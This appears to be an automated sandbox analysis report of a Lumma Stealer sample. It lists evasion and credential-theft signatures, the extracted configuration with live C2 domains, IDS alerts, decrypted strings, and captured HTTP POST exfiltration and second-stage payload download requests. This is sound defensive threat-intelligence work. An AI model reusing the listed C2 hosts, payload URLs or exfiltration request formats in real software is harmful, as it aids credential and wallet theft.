Edit tour

Windows Analysis Report
SFtDA07UDr.exe

Overview

General Information

Sample name:	SFtDA07UDr.exe renamed because original name is a hash value
Original sample name:	c7c35aa98a21f2d9b5a584f5f32b91a5.exe
Analysis ID:	1580351
MD5:	c7c35aa98a21f2d9b5a584f5f32b91a5
SHA1:	b9a135dce7f5fdbaac03a84650c869880cebceb5
SHA256:	e87601e6ed69dcfe547d8e8525083ee4f5f1cdfc0ae5c99a897445061adc8044
Tags:	exeuser-abuse_ch
Infos:

Detection

LummaC

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Detected unpacking (changes PE section rights)

Found malware configuration

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected LummaC Stealer

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Found many strings related to Crypto-Wallets (likely being stolen)

Hides threads from debuggers

LummaC encrypted strings found

Machine Learning detection for sample

PE file contains section with special chars

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Query firmware table information (likely to detect VMs)

Sample uses string decryption to hide its real strings

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Tries to detect sandboxes and other dynamic analysis tools (window names)

Tries to detect virtualization through RDTSC time measurements

Tries to evade debugger and weak emulator (self modifying code)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

AV process strings found (often used to terminate AV products)

Checks for debuggers (devices)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Entry point lies outside standard sections

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

One or more processes crash

PE file contains an invalid checksum

PE file contains sections with non-standard names

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Searches for user specific document files

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

SFtDA07UDr.exe (PID: 5576 cmdline: "C:\Users\user\Desktop\SFtDA07UDr.exe" MD5: C7C35AA98A21F2D9B5A584F5F32B91A5)

WerFault.exe (PID: 4088 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5576 -s 2044 MD5: C31336C1EFC2CCB44B4326EA793040F2)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Lumma Stealer, LummaC2 Stealer	Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.	No Attribution	https://0xmrmagnezi.github.io/malware%20analysis/LummaStealer/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/lummac2-breakdown#chrome-extensions-crx https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/ https://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/	https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["curverpluch.lat", "bashfulacid.lat", "talkynicer.lat", "manyrestro.lat", "tentabatte.lat", "shapestickyr.lat", "wordyfindy.lat", "observerfry.lat", "slipperyloo.lat"], "Build id": "LOGS11--LiveTraffic"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
sslproxydump.pcap	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security

Memory Dumps

Source	Rule	Description	Author
Process Memory Space: SFtDA07UDr.exe PID: 5576	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
Process Memory Space: SFtDA07UDr.exe PID: 5576	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: SFtDA07UDr.exe PID: 5576	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security
Process Memory Space: SFtDA07UDr.exe PID: 5576	JoeSecurity_LummaCStealer	Yara detected LummaC Stealer	Joe Security
decrypted.memstr	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security

Suricata Signatures

ET JA3 Hash - Possible Malware - Fake Firefox Font Update

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-24T11:22:14.299318+0100	2028371	3	Unknown Traffic	192.168.2.4	49730	104.21.36.201	443	TCP
2024-12-24T11:22:16.534183+0100	2028371	3	Unknown Traffic	192.168.2.4	49731	104.21.36.201	443	TCP
2024-12-24T11:22:19.744376+0100	2028371	3	Unknown Traffic	192.168.2.4	49732	104.21.36.201	443	TCP
2024-12-24T11:22:22.174193+0100	2028371	3	Unknown Traffic	192.168.2.4	49733	104.21.36.201	443	TCP
2024-12-24T11:22:24.544031+0100	2028371	3	Unknown Traffic	192.168.2.4	49734	104.21.36.201	443	TCP
2024-12-24T11:22:27.440361+0100	2028371	3	Unknown Traffic	192.168.2.4	49735	104.21.36.201	443	TCP
2024-12-24T11:22:29.963929+0100	2028371	3	Unknown Traffic	192.168.2.4	49738	104.21.36.201	443	TCP
2024-12-24T11:22:36.513923+0100	2028371	3	Unknown Traffic	192.168.2.4	49742	104.21.36.201	443	TCP
2024-12-24T11:22:39.250141+0100	2028371	3	Unknown Traffic	192.168.2.4	49744	185.166.143.48	443	TCP
2024-12-24T11:22:41.512332+0100	2028371	3	Unknown Traffic	192.168.2.4	49745	16.182.108.137	443	TCP

ET MALWARE Lumma Stealer CnC Host Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-24T11:22:15.298068+0100	2054653	1	A Network Trojan was detected	192.168.2.4	49730	104.21.36.201	443	TCP
2024-12-24T11:22:17.308251+0100	2054653	1	A Network Trojan was detected	192.168.2.4	49731	104.21.36.201	443	TCP
2024-12-24T11:22:37.284335+0100	2054653	1	A Network Trojan was detected	192.168.2.4	49742	104.21.36.201	443	TCP

ET MALWARE Lumma Stealer Related Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-24T11:22:15.298068+0100	2049836	1	A Network Trojan was detected	192.168.2.4	49730	104.21.36.201	443	TCP

ET MALWARE Lumma Stealer Related Activity M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-24T11:22:17.308251+0100	2049812	1	A Network Trojan was detected	192.168.2.4	49731	104.21.36.201	443	TCP

ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-24T11:22:20.866761+0100	2048094	1	Malware Command and Control Activity Detected	192.168.2.4	49732	104.21.36.201	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: SFtDA07UDr.exe

Avira: detected

Found malware configuration

Source: SFtDA07UDr.exe.5576.0.memstrmin

Malware Configuration Extractor: LummaC {"C2 url": ["curverpluch.lat", "bashfulacid.lat", "talkynicer.lat", "manyrestro.lat", "tentabatte.lat", "shapestickyr.lat", "wordyfindy.lat", "observerfry.lat", "slipperyloo.lat"], "Build id": "LOGS11--LiveTraffic"}

Multi AV Scanner detection for submitted file

Source: SFtDA07UDr.exe

ReversingLabs: Detection: 55%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: SFtDA07UDr.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 00000000.00000002.2463031259.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp	String decryptor: bashfulacid.lat
Source: 00000000.00000002.2463031259.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp	String decryptor: tentabatte.lat
Source: 00000000.00000002.2463031259.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp	String decryptor: curverpluch.lat
Source: 00000000.00000002.2463031259.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp	String decryptor: talkynicer.lat
Source: 00000000.00000002.2463031259.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp	String decryptor: shapestickyr.lat
Source: 00000000.00000002.2463031259.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp	String decryptor: manyrestro.lat
Source: 00000000.00000002.2463031259.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp	String decryptor: slipperyloo.lat
Source: 00000000.00000002.2463031259.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp	String decryptor: wordyfindy.lat
Source: 00000000.00000002.2463031259.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp	String decryptor: observerfry.lat
Source: 00000000.00000002.2463031259.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp	String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000000.00000002.2463031259.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp	String decryptor: TeslaBrowser/5.5
Source: 00000000.00000002.2463031259.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp	String decryptor: - Screen Resoluton:
Source: 00000000.00000002.2463031259.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp	String decryptor: - Physical Installed Memory:
Source: 00000000.00000002.2463031259.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp	String decryptor: Workgroup: -
Source: 00000000.00000002.2463031259.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp	String decryptor: LOGS11--LiveTraffic

Source: SFtDA07UDr.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 104.21.36.201:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.36.201:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.36.201:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.36.201:443 -> 192.168.2.4:49733 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.36.201:443 -> 192.168.2.4:49734 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.36.201:443 -> 192.168.2.4:49735 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.36.201:443 -> 192.168.2.4:49738 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.36.201:443 -> 192.168.2.4:49742 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.166.143.48:443 -> 192.168.2.4:49744 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 16.182.108.137:443 -> 192.168.2.4:49745 version: TLS 1.2

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49730 -> 104.21.36.201:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49730 -> 104.21.36.201:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49731 -> 104.21.36.201:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49731 -> 104.21.36.201:443
Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49732 -> 104.21.36.201:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49742 -> 104.21.36.201:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: curverpluch.lat
Source: Malware configuration extractor	URLs: bashfulacid.lat
Source: Malware configuration extractor	URLs: talkynicer.lat
Source: Malware configuration extractor	URLs: manyrestro.lat
Source: Malware configuration extractor	URLs: tentabatte.lat
Source: Malware configuration extractor	URLs: shapestickyr.lat
Source: Malware configuration extractor	URLs: wordyfindy.lat
Source: Malware configuration extractor	URLs: observerfry.lat
Source: Malware configuration extractor	URLs: slipperyloo.lat

Source: Joe Sandbox View	IP Address: 185.166.143.48 185.166.143.48
Source: Joe Sandbox View	IP Address: 104.21.36.201 104.21.36.201

Source: Joe Sandbox View

JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49733 -> 104.21.36.201:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49735 -> 104.21.36.201:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49742 -> 104.21.36.201:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49731 -> 104.21.36.201:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49730 -> 104.21.36.201:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49732 -> 104.21.36.201:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49745 -> 16.182.108.137:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49738 -> 104.21.36.201:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49744 -> 185.166.143.48:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49734 -> 104.21.36.201:443

Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: observerfry.lat
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 53Host: observerfry.lat
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=24K1ZWSU412ZUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 18133Host: observerfry.lat
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=UPCS30ZQFTUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8742Host: observerfry.lat
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=HRAMBHOZQ6QU9XA6User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20431Host: observerfry.lat
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=ND0VHYYEUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1217Host: observerfry.lat
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=T0XBLR4I9QX22ADBNUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 587941Host: observerfry.lat
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 88Host: observerfry.lat
Source: global traffic	HTTP traffic detected: GET /mynewworkspace123312/scnd/downloads/FormattingCharitable.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: bitbucket.org
Source: global traffic	HTTP traffic detected: GET /70e84e0b-e14f-45c5-ab65-07760e9609fc/downloads/eaef3307-3cc1-464c-9988-4c3c4d541130/FormattingCharitable.exe?response-content-disposition=attachment%3B%20filename%3D%22FormattingCharitable.exe%22&AWSAccessKeyId=ASIA6KOSE3BNJTP5QYLD&Signature=0gsyNjuf756Vq6K0RZV6Vi%2FWImU%3D&x-amz-security-token=IQoJb3JpZ2luX2VjECMaCXVzLWVhc3QtMSJGMEQCIHqj26tV65D%2FvAw%2Bywel8AEAJF9JoNqhKOwprvxw9mEDAiAQk%2BzsgC5YLtSZ8mAOhSrQ5EbP1nlfHG9kQ3PezQ3lyiqwAgjr%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F8BEAAaDDk4NDUyNTEwMTE0NiIMkMl%2BRFEwMu0%2FzGyXKoQC2a%2FHBSul83NQ8p8t4txxanRAkeBJUdiNx6lf7uqSqP8BZIcvUc4n4ENPpmvQTTAo0O3VURV0yP9IvWqw0DnRXdzjKwUXK6q3TWovFckZLyzZOouJiEgWlAWVLNyQT02RcFEWT587G0QoXUTx1Lz4Of7hNeh6k9Ne92Y3iToJcaZJ6w2XyEDHnwEb9%2Fd5oPOV8NOH1SE0e0A4r%2FJyHUHEyILhq%2FoP6G28RcqDqxCuvgqOqnyGdQNmRsMK5HdHjjv2qAhhfY15lHUk5IFAPV43RovV0YK1G0h%2BsF6TaGbErDm4D016g54EiCmw49k%2BC5HSNeGcM%2BkT%2FDIgX0GK5IWQnYh6VugwipCquwY6ngFs24wzlDwNBHDL67C%2FwjBEnksCoFhSTvCORCtiVaOPIzzOlrGmKSU3Or5N2V18%2Fq20tIXooICKu8P4J2I4rdz2f%2FJD7Dq%2BF00i4OW%2FxQJ6LqwaPMAIX%2BQcsPV%2FFwo5WAIfoy4W9ygeWg5MqgxcHVu2NP6C0NWOAsSPP7l0qE173HnB8MnL9e%2BJ20gyBJBLs4rwHZCoPdcAVgc%2FS9V3Jg%3D%3D&Expires=1735036690 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: bbuseruploads.s3.amazonaws.com

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /mynewworkspace123312/scnd/downloads/FormattingCharitable.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: bitbucket.org
Source: global traffic	HTTP traffic detected: GET /70e84e0b-e14f-45c5-ab65-07760e9609fc/downloads/eaef3307-3cc1-464c-9988-4c3c4d541130/FormattingCharitable.exe?response-content-disposition=attachment%3B%20filename%3D%22FormattingCharitable.exe%22&AWSAccessKeyId=ASIA6KOSE3BNJTP5QYLD&Signature=0gsyNjuf756Vq6K0RZV6Vi%2FWImU%3D&x-amz-security-token=IQoJb3JpZ2luX2VjECMaCXVzLWVhc3QtMSJGMEQCIHqj26tV65D%2FvAw%2Bywel8AEAJF9JoNqhKOwprvxw9mEDAiAQk%2BzsgC5YLtSZ8mAOhSrQ5EbP1nlfHG9kQ3PezQ3lyiqwAgjr%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F8BEAAaDDk4NDUyNTEwMTE0NiIMkMl%2BRFEwMu0%2FzGyXKoQC2a%2FHBSul83NQ8p8t4txxanRAkeBJUdiNx6lf7uqSqP8BZIcvUc4n4ENPpmvQTTAo0O3VURV0yP9IvWqw0DnRXdzjKwUXK6q3TWovFckZLyzZOouJiEgWlAWVLNyQT02RcFEWT587G0QoXUTx1Lz4Of7hNeh6k9Ne92Y3iToJcaZJ6w2XyEDHnwEb9%2Fd5oPOV8NOH1SE0e0A4r%2FJyHUHEyILhq%2FoP6G28RcqDqxCuvgqOqnyGdQNmRsMK5HdHjjv2qAhhfY15lHUk5IFAPV43RovV0YK1G0h%2BsF6TaGbErDm4D016g54EiCmw49k%2BC5HSNeGcM%2BkT%2FDIgX0GK5IWQnYh6VugwipCquwY6ngFs24wzlDwNBHDL67C%2FwjBEnksCoFhSTvCORCtiVaOPIzzOlrGmKSU3Or5N2V18%2Fq20tIXooICKu8P4J2I4rdz2f%2FJD7Dq%2BF00i4OW%2FxQJ6LqwaPMAIX%2BQcsPV%2FFwo5WAIfoy4W9ygeWg5MqgxcHVu2NP6C0NWOAsSPP7l0qE173HnB8MnL9e%2BJ20gyBJBLs4rwHZCoPdcAVgc%2FS9V3Jg%3D%3D&Expires=1735036690 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: bbuseruploads.s3.amazonaws.com

Source: global traffic	DNS traffic detected: DNS query: observerfry.lat
Source: global traffic	DNS traffic detected: DNS query: bitbucket.org
Source: global traffic	DNS traffic detected: DNS query: bbuseruploads.s3.amazonaws.com

Source: unknown

HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: observerfry.lat

Source: SFtDA07UDr.exe, 00000000.00000003.2138520574.0000000001704000.00000004.00000020.00020000.00000000.sdmp, SFtDA07UDr.exe, 00000000.00000002.2464326767.0000000001708000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/off/def.exe
Source: SFtDA07UDr.exe, 00000000.00000003.2138520574.000000000171D000.00000004.00000020.00020000.00000000.sdmp, SFtDA07UDr.exe, 00000000.00000003.2138609621.000000000174B000.00000004.00000020.00020000.00000000.sdmp, SFtDA07UDr.exe, 00000000.00000002.2464326767.000000000171D000.00000004.00000020.00020000.00000000.sdmp, SFtDA07UDr.exe, 00000000.00000003.2138388755.000000000174A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: SFtDA07UDr.exe, 00000000.00000003.1925427609.0000000005D25000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: SFtDA07UDr.exe, 00000000.00000003.1925427609.0000000005D25000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: SFtDA07UDr.exe, 00000000.00000003.2138609621.000000000174B000.00000004.00000020.00020000.00000000.sdmp, SFtDA07UDr.exe, 00000000.00000003.2138388755.000000000174A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: SFtDA07UDr.exe, 00000000.00000003.2138520574.000000000171D000.00000004.00000020.00020000.00000000.sdmp, SFtDA07UDr.exe, 00000000.00000003.2138609621.000000000174B000.00000004.00000020.00020000.00000000.sdmp, SFtDA07UDr.exe, 00000000.00000002.2464326767.000000000171D000.00000004.00000020.00020000.00000000.sdmp, SFtDA07UDr.exe, 00000000.00000003.2138388755.000000000174A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: SFtDA07UDr.exe, 00000000.00000003.2138609621.000000000174B000.00000004.00000020.00020000.00000000.sdmp, SFtDA07UDr.exe, 00000000.00000003.2138388755.000000000174A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.com/codesigningrootr45.crl0U
Source: SFtDA07UDr.exe, 00000000.00000003.2138520574.000000000171D000.00000004.00000020.00020000.00000000.sdmp, SFtDA07UDr.exe, 00000000.00000003.2138609621.000000000174B000.00000004.00000020.00020000.00000000.sdmp, SFtDA07UDr.exe, 00000000.00000002.2464326767.000000000171D000.00000004.00000020.00020000.00000000.sdmp, SFtDA07UDr.exe, 00000000.00000003.2138388755.000000000174A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
Source: SFtDA07UDr.exe, 00000000.00000003.2045355742.0000000001710000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.micro
Source: SFtDA07UDr.exe, 00000000.00000003.1925427609.0000000005D25000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: SFtDA07UDr.exe, 00000000.00000003.2138520574.000000000171D000.00000004.00000020.00020000.00000000.sdmp, SFtDA07UDr.exe, 00000000.00000003.2138609621.000000000174B000.00000004.00000020.00020000.00000000.sdmp, SFtDA07UDr.exe, 00000000.00000002.2464326767.000000000171D000.00000004.00000020.00020000.00000000.sdmp, SFtDA07UDr.exe, 00000000.00000003.2138388755.000000000174A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: SFtDA07UDr.exe, 00000000.00000003.1925427609.0000000005D25000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: SFtDA07UDr.exe, 00000000.00000003.1925427609.0000000005D25000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: SFtDA07UDr.exe, 00000000.00000003.2138609621.000000000174B000.00000004.00000020.00020000.00000000.sdmp, SFtDA07UDr.exe, 00000000.00000003.2138388755.000000000174A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTru
Source: SFtDA07UDr.exe, 00000000.00000003.2138520574.000000000171D000.00000004.00000020.00020000.00000000.sdmp, SFtDA07UDr.exe, 00000000.00000003.2138609621.000000000174B000.00000004.00000020.00020000.00000000.sdmp, SFtDA07UDr.exe, 00000000.00000002.2464326767.000000000171D000.00000004.00000020.00020000.00000000.sdmp, SFtDA07UDr.exe, 00000000.00000003.2138388755.000000000174A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: SFtDA07UDr.exe, 00000000.00000003.1925427609.0000000005D25000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: SFtDA07UDr.exe, 00000000.00000003.1925427609.0000000005D25000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: SFtDA07UDr.exe, 00000000.00000002.2466286447.00000000063C9000.00000002.00000800.00020000.00000000.sdmp, SFtDA07UDr.exe, 00000000.00000003.2138388755.000000000172B000.00000004.00000020.00020000.00000000.sdmp, SFtDA07UDr.exe, 00000000.00000003.2138214038.0000000005D07000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: SFtDA07UDr.exe, 00000000.00000003.1925427609.0000000005D25000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: SFtDA07UDr.exe, 00000000.00000003.2138520574.000000000171D000.00000004.00000020.00020000.00000000.sdmp, SFtDA07UDr.exe, 00000000.00000003.2138609621.000000000174B000.00000004.00000020.00020000.00000000.sdmp, SFtDA07UDr.exe, 00000000.00000002.2464326767.000000000171D000.00000004.00000020.00020000.00000000.sdmp, SFtDA07UDr.exe, 00000000.00000003.2138388755.000000000174A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0A
